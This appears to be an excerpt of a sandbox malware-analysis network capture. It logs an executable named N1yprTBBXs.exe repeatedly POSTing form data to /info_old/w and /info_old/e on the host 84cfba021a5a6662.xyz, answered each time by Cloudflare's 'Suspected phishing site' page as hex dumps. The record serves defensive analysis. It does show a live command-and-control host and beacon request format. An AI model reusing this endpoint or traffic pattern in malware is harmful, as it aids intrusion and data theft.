name="robots" content="noindex, nofollow" /><meta name="viewport
Jan 29, 2021 17:38:38.746789932 CET	207	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:38.798671007 CET	209	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d7bca264b855809d8d4b05eb87c1fc9ff1611938318; expires=Sun, 28-Feb-21 16:38:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09be1c00000207450ae9000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=QwgipNFngtvthWM4vzg5cnnB4phOPVB1H1nJ94d5%2FtLdtPbaa%2BQE7%2BXe%2BYnHqam2aS14GO%2BggKTpIC%2Ff7GX7uk9mowxUSpRH0PBwPJ3%2BX%2BHEB6IJPA%3D%3D"}],"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6194627c6ede2074-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name
Jan 29, 2021 17:38:38.929573059 CET	213	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:38.990947008 CET	215	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d7bca264b855809d8d4b05eb87c1fc9ff1611938318; expires=Sun, 28-Feb-21 16:38:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09be27c00002074ed374000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=P8QyBKprq2Hhaamq%2BMcuho9cb135xpo%2BSZUjTzq%2F%2FDTBAYHPz9WKa43m0lSZZP4TsqaIIuYbjMSN5kJmH%2FyM4akUqL0NiC1MuYLr%2BxDyR412x2QkFQ%3D%3D"}],"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6194627d8a242074-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="vi
Jan 29, 2021 17:38:42.105988979 CET	251	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:42.157530069 CET	253	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=dafc2269efb29a3d032863a3cf4025f661611938322; expires=Sun, 28-Feb-21 16:38:42 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09beede0000207413915000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LgciL5091s7SgIANBDdXrT5hElDO3RYRQ8s%2F1XbWIWN%2BGoj8y34Mb9NMoV2Wm105WERrjf22gNgxarQqxw%2BdkZuNj2d1pZIgsL0RpJ6OryQrhHRwrQ%3D%3D"}],"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 619462916ad42074-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49720	104.21.23.16	80	C:\Users\user\Desktop\N1yprTBBXs.exe

Timestamp	kBytes transferred	Direction	Data
Jan 29, 2021 17:38:46.580929995 CET	258	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:46.659503937 CET	259	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d1a284289fa3f4f3ff90e51abb2deb23a1611938326; expires=Sun, 28-Feb-21 16:38:46 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09c00580000722de58a1000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=vj1Vqs2FD2NYSoF7uok2Ug7SdDHDX5%2FX7Ez6WiJ99y2YyDaBEodnTgwX9CBAamkhpvh1v76jR6iRD7K4QkgoGmEzhqLiYIWIZ7T4LaNf3Nxe6Owv4A%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619462ad5858722d-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" co
Jan 29, 2021 17:38:57.523209095 CET	606	OUT	POST /info_old/e HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 677 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:57.578520060 CET	608	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d0c77f8ee470537dddd2ec92d793e6cef1611938337; expires=Sun, 28-Feb-21 16:38:57 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09c2b1b0000722de5b61000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2BZOJ1cnVLyD8bjwQnQt99GunNGqbpH1vv7YKluExGYIR1FU%2B2y4iFkkwUc2YSO3VbUXGZV3xWKV%2BVmTFtD9bZvArPsHP%2Bg7ZOzCaA4jBLLoue8wa1Q%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619462f1bd2b722d-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewpo
Jan 29, 2021 17:38:57.634712934 CET	612	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:57.693810940 CET	614	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d0c77f8ee470537dddd2ec92d793e6cef1611938337; expires=Sun, 28-Feb-21 16:38:57 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09c2b8e0000722de28e5000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=TltZmQ4ZAgCnC4XZHARQuJ6c3SjymJnZnZrmM9mXZoJeXnjrEWuI%2FMrWj8lYOCOeNeO%2BRY2jk3uPLxZ4AMtf9xZFwNzvgcohA4k8gWqE5jaNMamf6Q%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619462f27def722d-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 